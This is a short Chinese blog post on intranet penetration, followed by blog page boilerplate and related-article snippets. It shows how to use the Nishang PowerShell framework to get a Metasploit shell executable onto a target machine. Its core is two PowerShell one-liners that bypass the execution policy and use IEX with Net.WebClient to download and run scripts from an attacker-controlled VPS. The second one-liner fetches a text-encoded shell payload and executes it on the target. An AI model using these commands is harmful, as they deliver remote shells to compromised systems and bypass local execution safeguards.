利用Nishang实现文件上传

已于 2023-08-07 17:07:11 修改
阅读量46 收藏
点赞数
分类专栏: 内网渗透 文章标签: linux
于 2021-09-16 18:44:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51524329/article/details/120335110
版权

利用Nishang实现文件上传
Download_Execute是Nishang中一个下载执行脚本,它在实战中最常用的功能就是下载一个文本文件,然后将其转换为exe可执行文件执行。

第一步:首先攻击者在本地用Nishang中的exetotext.ps1脚本将exe可执行文件更改为文本文件(这里我们的exe为msf生成的shell.exe)

powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/nishang/Utility/ExetoText.ps1');ExetoText c:\shell.exe c:\shell.txt"

之后,将生成的shell.txt放到vps上面,然后在目标主机上面用Download_Execute脚本下载改shell.txt,将其转化为exe后执行

powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/nishang/Execution/Download_Execute.ps1');Download_Execute http://39.xxx.xxx.210/shell.txt
红云谈安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Nishang2022最新可用版本,稳定
06-28
Antak-Webshell:在内存中执行PowerShell脚本,运行命令,并使用此Webshell下载和上传文件 Backdoors:一个后门,可以从第三方网站接收指令,并在内存中执行PowerShell脚本 Bypass:实施公告已知方法来绕过 Client:...
NiShang.7z
09-05
NiShang.7z】是一个Java Web项目,主要用于实现一个服装商城的在线平台。这个项目采用的技术栈主要包括Servlet和JSP,它们是Java Web开发中的核心组件,用于构建动态网站应用。Servlet是Java编写的服务器端程序,...
内网神器-Nishang之信息收集篇(一)
qq_45434762的博客
07-05 638
Nishang简介Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。Nishang被广泛应用于渗透测试的各个阶段,本文主要介绍如何使...
内网信息收集与上传下载
技术超强的网络安全平台
12-06 197
在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础。 可以说内网渗透测试,其本质就是信息收集。信息收集的深度,直接关系到内网渗透测试的成败。当你拿下内网的一台主机后,面对的是一片未知的区域,所以首先要做的就是对当前所处的网络环境进行判断。包括以下几点: 对当前机器角色的判断 对当前机器所处的网络环境进行判断 对当前机器所处的网络区域进行判断 本机信息收集 查看当前用户、权限 whoamiwhoami /all // 查看当前域并获.
内网神器-Nishang之信息收集篇(二)
qq_45434762的博客
07-08 278
域信息收集查询域net view /domain 查询域内计算机net view /domain:nowsec 查询域内所有用户组列表net group /domain 查询所有与成员计...
细说——Nishang
LainWith的博客
09-27 793
介绍 Powershell用于渗透测试其实早在多年前就已经被提出了,利用Powershell,攻击者可以在无需接触磁盘的情况下执行命令等,并且相较已经被大家广泛关注并防御的cmd而言,Powershell并非那么的引人瞩目。Nishang是基于PowerShell的渗透测试专用工具。它集成了框架、脚本和各种payload,能够帮助渗透测试人员在对Windows目标的全过程检测中使用,项目地址:https://github.com/samratashok/nishang ​ 【基于隐私,以及实验效果,我会在虚
Nishang(一)
gclome的博客
08-02 883
《web安全攻防》学习笔记之Nishang 文章目录1、简介2、Nishang导入与帮助获取3、Nishang模块攻击实战1 Check-VM2 Invoke-CredentialsPhish3Copy-VSS4 FireBuster FireListener 扫描器5 Keylogger键盘记录6 Invoke Mimikatz7 Get-PassHashes8 获取用户的密码提示信息4、PowerShell隐藏通信隧道1基于Tcp协议的PowerShell交互式Shell 1、简介 Nishang是一款
Powershell 渗透测试工具-Nishang
weixin_34023982的博客
01-10 273
Powershell 渗透测试工具-Nishang 分享到:   作者:V1ct0r 稿费:500RMB(不服你也来投稿啊!) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 传送门 【技术分享】Powershell 渗透测试工具-Nishang(一)   0x00 介绍 Powershell用于渗透测试其实早在多年前就已经被提出了。利用Powershe...
文件上传
weixin_30530939的博客
07-21 64
我们在做渗透测试的时候会经常遇到存在命令执行的Windows服务器,而且不能上传shell,唯一的入口就是命令执行,这种情况下,我们需要向服务器上传一个大一点的工具,如何实现,这就是本文章主要的内容。 利用http协议下载文件 利用vbs下载 将下面的代码保存为test.vbs 执行如下语句: cscript test.vbs 利用powershell下载 将如下代码保存为test....
15种下载文件的方法
kevinhanser
03-30 8638
转载:https://blog.netspi.com/15-ways-to-download-a-file/ 瑞恩甘德鲁德 原创时间:2014年6月16日 Pentesters经常将文件上传到受感染的盒子以帮助进行权限提升,或者保持在计算机上的存在。本博客将介绍将文件从您的计算机移动到受感染系统的15种不同方法。对于那些在盒子上存在且需要开发后选项的渗透测试人员以及只想移动文件的系统管理员来说...
文件下载骚姿势
tomyyyyy
07-21 123
我们在做渗透测试的时候会经常遇到存在命令执行的Windows服务器,而且不能上传shell,唯一的入口就是命令执行,这种情况下,我们需要向服务器上传一个大一点的工具,如何实现,这就是本文章主要的内容。 利用http协议下载文件 利用vbs下载 将下面的代码保存为test.vbs 执行如下语句: cscript test.vbs 利用powershell下载 将如下代码保存为test.ps1 $...
nishang, Nishang PowerShell测试和攻击性安全.zip
09-18
nishang, Nishang PowerShell测试和攻击性安全 Nishang是一个框架和脚本,它允许使用PowerShell安全性。穿透测试和红色组合的脚本。 在渗透测试的所有阶段,Nishang都是有用的。按 nikhil_mitt用法导入当前...
nishangNishang-用于红队,渗透测试和进攻安全的进攻性PowerShell
02-05
在压缩包文件"nishang-master"中,你可能会找到以下内容: - **源代码**:Nishang的PowerShell脚本和模块的源代码,可以供研究和定制。 - **文档**:可能包括关于如何使用Nishang的说明,以及每个模块的具体用途和...
公众号和小程序的java源码-nishang:Nishang-用于渗透测试和攻击性安全的PowerShell。https://github.c
06-06
Nishang 是一个脚本和有效载荷的框架和集合,它支持使用 PowerShell 进行攻击性安全、渗透测试和红队。 Nishang 在渗透测试的所有阶段都很有用。 经过 用法 导入当前 PowerShell 会话中的所有脚本(PowerShell v3 ...
虚拟内存和linux(操作系统part1)
最新发布
linjixia的博客
08-24 468
八股之虚拟内存和Linux部分的笔记。
Linux 线程的控制 互斥与同步
qq_63145217的博客
08-23 894
include //头文件sem_t sem;信号量的类型 信号量的变量。
多进程和多线程基础概念LINUX
2301_79109608的博客
08-22 1033
直接访问物理地址,会导致地址空间没有隔离,很容易导致数据被修改通过虚拟地址空间可以实现每个进程空间都是独立的,操作系统会映射到不用的物理地址区间,在访问时互不干扰.进程状态分为三个基本状态,即运行态,就绪态,阻塞态。在五态模型中,进程分为新建态、终止态,运行态,就绪态,阻塞态。并发:有限的 cpu 核芯的情况下 ,利用快速交替(时间片轮转)执行来达到宏观上的同时执行。虚拟地址 : 虚拟地址并不代表真实的内存空间,而是一个用于寻址的编号。并行:在 cpu 多核的支持下,实现物理上的同时执行。
Linux自旋锁和读写锁
m0_74830524的博客
08-24 603
在前面的文章中我们已经介绍了有关互斥锁的概念与使用,本篇将开始介绍在 Linux 中的自旋锁和读写锁。这三种锁分别用于在不同的应用场景之中,其中互斥锁最为常用,但是我们需要了解一下其他的锁。 对于自旋锁和读写锁都介绍了其原理以及接口使用,并且给出了样例代码。
Windows屏幕保护程序:安全风险与滥用
此外,Nishang框架提供了一个PowerShell脚本,同样可以实现这种攻击,但这种方法需要更高的权限,因为脚本会在本地注册表中存储执行远程托管有效负载的PowerShell命令。" 在深入理解这个话题时,我们需要注意以下几...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值